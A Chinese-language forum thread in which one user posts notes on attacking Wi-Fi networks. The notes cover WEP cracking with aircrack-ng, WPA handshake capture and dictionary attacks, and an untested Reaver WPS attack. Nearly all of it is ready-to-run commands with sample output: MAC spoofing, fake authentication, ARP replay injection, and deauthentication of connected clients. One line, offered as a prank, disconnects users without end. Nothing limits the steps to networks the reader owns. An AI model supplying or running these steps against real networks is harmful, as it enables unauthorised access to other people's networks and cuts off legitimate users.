Aircrack-ng 筆記 [論壇 - Ubuntu 非官方發行版討論]


正在瀏覽:   1 名遊客


 到底部   前一個主題   下一個主題  [無發表權] 請登錄或者註冊



Aircrack-ng 筆記
會員四級
註冊日期:
2015/9/29 21:19
所屬群組:
已註冊使用者
等級: 16
HP : 0 / 380
MP : 100 / 4659
EXP: 22
離線
Aircrack-ng 網路上資料見怪不怪. 整理出來應該也無所謂.

但如果要玩 Aircrack-ng 我覺得 Kali 還是首選, 因為聽說它的核心有打補釘. 只是我還沒去詳細研究就是了.


工具說明:
ifconfig :啟動及查看網卡狀態。
iwconfig :查看無線網卡的狀態及作用模式。
airmon-ng :將無線網卡啟用在監聽模式。
airodump-ng :擷取往來的封包。
aireplay-ng :利用阻斷方式讓 Client重新尋求連線。
aircrack-ng :利用擷取的封包檔進行破解,


WEP 加密 (ADHOC) 密碼破解:

==========================
一 無線網卡介面
==========================
查看網路卡介面狀態
# ifconfig -a

# iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

無限網卡為 wlan0

==========================
二 修改MAC
==========================
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0

==========================
三 設定無限網卡為監聽模式 (monitor)
==========================
設定無限網卡為監聽模式
# airmon-ng check kill
# airmon-ng start wlan0

無限網卡設置為監聽模式後名稱變為: wlan0mon

啟動無線網卡
# ifconfig wlan0mon up

==========================
四 探測AP並擷取封包 (airodump-ng)
==========================
搜尋所有頻道AP站台
# airodump-ng wlan0mon
 CH 14 ][ Elapsed: 30 s ][ 2016-09-11 13:49                                         
                                                                                            
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                            
 22:05:87:11:C8:A6   -1        3        0    0  10  54 . WEP  WEP         Linux-ADHOC       
 B0:B2:DC:BB:B4:A0  -91        5        1    0  11  54e  WPA  CCMP   PSK  CHT8812           
                                                                                            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                   
                                                                                            
 22:05:87:11:C8:A6  90:F6:52:11:C8:A6  -52    0 - 1      0       72  Linux-ADHOC             


按 Ctl+C. 停止. 例如要監聽的「ESSID」為「Linux-ADHOC」,頻道為CH10. 改變監聽頻道為10, 只擷取頻道10的IVs, 這樣可以節省空間.

擷取頻道1封包
例: airodump-ng -c 10 -w --bssid
# airodump-ng -c 10 -w Linux-ADHOC --bssid 22:05:87:11:C8:A6 wlan0mon

參數解釋:
-c 擷取目標AP的工作頻道
-w 保存擷取封包. 檔名設定為 Linux-ADHOC, 但產生的文件是 Linux-ADHOC-01.cap

不要關閉 airodump-ng

==========================
五 偽造認證 (aireplay)
==========================
另開新的終端機, 測試注入
# aireplay-ng -9 wlan0mon

使用 aireplay 注入封包, 所以可以輕易擷取封包. 打開新的終端機, 將 BSSID 複製, 貼到新的終端機上.
例: aireplay-ng -1 0 -e
# aireplay-ng -1 0 -e Linux-ADHOC wlan0mon

如果連線後又斷開, 在這種情況下,建立定期重新連接延遲. 以每20秒重新連接AP:
例: aireplay-ng -1 20 -e
# aireplay-ng -1 20 -e Linux-ADHOC wlan0mon

抓取合法使用者的 ARP 要求,並且仿造重送
# aireplay-ng -3 -e
# aireplay-ng -3 -e Linux-ADHOC wlan0mon

不要關閉 aireplay-ng

==========================
六 破解密碼 (aircrack)
==========================
1. 打開一個新的終端機,然後輸入以下指令。Aircrack 可以自動讀取更新後的文件,所以airodump aireplay-ng 與 Aircrack 三者可同時進行。
# aircrack-ng LinuxAP-01.cap

跑字典方法
# aircrack-ng -w password.txt LinuxAP-01.cap

基本上WEP只需要date(IVs) 擷取數量足夠, 無須字典即可破解.

==========================
復原
==========================
關閉監聽
# airmon-ng stop wlan0mon

復原 Network Manager
# service networking start
# service network-manager start

2016/9/11 15:12
應用擴展 工具箱
回覆: Aircrack-ng 筆記
會員四級
註冊日期:
2015/9/29 21:19
所屬群組:
已註冊使用者
等級: 16
HP : 0 / 380
MP : 100 / 4659
EXP: 22
離線
WPA/WPA2 加密 (AP) 密碼破解:

==========================
一 無線網卡介面
==========================
查看網路卡介面狀態
# ifconfig -a

# iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

無限網卡為 wlan0

==========================
二 修改MAC
==========================
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0

==========================
三 設定無限網卡為監聽模式 (monitor)
==========================
設定無限網卡為監聽模式
# airmon-ng check kill
# airmon-ng start wlan0

無限網卡設置為監聽模式後名稱變為: wlan0mon

啟動無線網卡
# ifconfig wlan0mon up

==========================
四 探測AP並擷取封包 (airodump-ng)
==========================
搜尋所有頻道AP站台
# airodump-ng wlan0mon
 CH 11 ][ Elapsed: 0 s ][ 2016-09-11 13:17                                         
                                                                                                   
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                   
 90:F6:52:11:C8:A7  -57        5        0    0   1  54   WPA2 CCMP   PSK  LinuxAP                  
                                                                                                   
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                         
                                                                                         
 22:03:95:11:C8:A6  90:F6:52:11:C8:A6  -44    0 - 1      0       44                       


按 Ctl+C. 停止. 例如要監聽的「ESSID」為「LinuxAP」,頻道為CH1. 改變監聽頻道為1, 只擷取頻道1的IVs, 這樣可以節省空間.

擷取頻道1封包
例: airodump-ng -c 1 -w --bssid
# airodump-ng -c 1 -w LinuxAP --bssid 90:F6:52:11:C8:A7 wlan0mon

參數解釋:
-c 擷取目標AP的工作頻道
-w 保存擷取封包. 檔名設定為 LinuxAP, 但產生的文件是 LinuxAP-01.cap

不要關閉 airodump-ng

==========================
五 擷取 WPA Handshake 握手包 (aireplay)
==========================
WPA 需要合法使用者與無線基地台之間,一開始建立連線的 handshake 交換資料。我們使用 airodump-ng 來抓取所有相關的無線封包.
 CH  1 ][ Elapsed: 36 s ][ 2016-09-11 14:26 ][ WPA handshake: 90:F6:52:11:C8:A7       
                                                                                      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                      
 90:F6:52:11:C8:A7  -53   1      341       29    0   1  54   WPA2 CCMP   PSK  LinuxAP 
                                                                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe            
                                                                                      
 90:F6:52:11:C8:A7  70:72:3C:B6:A3:01  -36   54 - 1      8       24  LinuxAP           

如果一直等待卻沒有抓到任何的 handshake,但是你可以看到的確有合法的使用者在連線的話,你可以讓使用者斷線 (STATION底下為連接到ESSID的使用者MAC),當他們重新連線的時候,攻擊者可以抓到 handshake.

一旦取得 WPA handshake 握手包 (airodump-ng 右上角 WPA handshake 字樣) 即可停止 airodump-ng 進行密碼破解.

讓連線的使用者斷線,以擷取握手包,另開新的終端機:
例: aireplay-ng -0 5 -a -c wlan0mon
# aireplay-ng -0 5 -a 90:F6:52:11:C8:A7 -c 70:72:3C:B6:A3:01 wlan0mon

參數解釋:
-0 採用 deauth 攻擊模式, 後面數字為攻擊次數
-a 後面為BSSID (無線基地台的MAC位址)
-c 後面為STATION (連接無線基地台使用者的MAC位址)

惡搞:
讓使用者無止境斷線
aireplay-ng -0 0 -a -c wlan0mon

==========================
六 破解密碼 (aircrack)
==========================
字典破解
例: aircrack-ng -w <字典檔> <已擷取的握手包>
# aircrack-ng -w password.txt LinuxAP-01.cap

WPA密碼破解取決於:
1.能否取得握手包
2.字典檔裡面有無正確密碼

如果字典檔裡無正確密碼, 幾乎無解.
so...算是目前最安全的加密方式.

==========================
復原
==========================
關閉監聽
# airmon-ng stop wlan0mon

復原 Network Manager
# service networking start
# service network-manager start

2016/9/11 15:14
應用擴展 工具箱
回覆: Aircrack-ng 筆記
會員四級
註冊日期:
2015/9/29 21:19
所屬群組:
已註冊使用者
等級: 16
HP : 0 / 380
MP : 100 / 4659
EXP: 22
離線
Reaver 破解 WPA (WPS)

---- 未實際測試的整理資料... 因為沒WPS可測

查看網卡介面
# iwconfig
lo        no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
eth0      no wireless extensions.

設定無線網卡為監聽模式
# airmon-ng check kill
# airmon-ng start wlan0

無線網卡介面變為 wlan0mon

啟用無線網卡
# ifconfig wlan0mon up

掃描頻道
# wash -i wlan0mon

攻擊WPS
# reaver -i wlan0mon -b -c 1 -a -N -vv

# reaver -i wlan0mon -b -vv


關閉監聽
# airmon-ng stop wlan0mon

復原 Network Manager
# service networking start
# service network-manager start

2016/9/11 15:25
應用擴展 工具箱


 [無發表權] 請登錄或者註冊


可以查看帖子.
不可發帖.
不可回覆.
不可編輯自己的帖子.
不可刪除自己的帖子.
不可發起投票調查.
不可在投票調查中投票.
不可上傳附件.
不可不經審核直接發帖.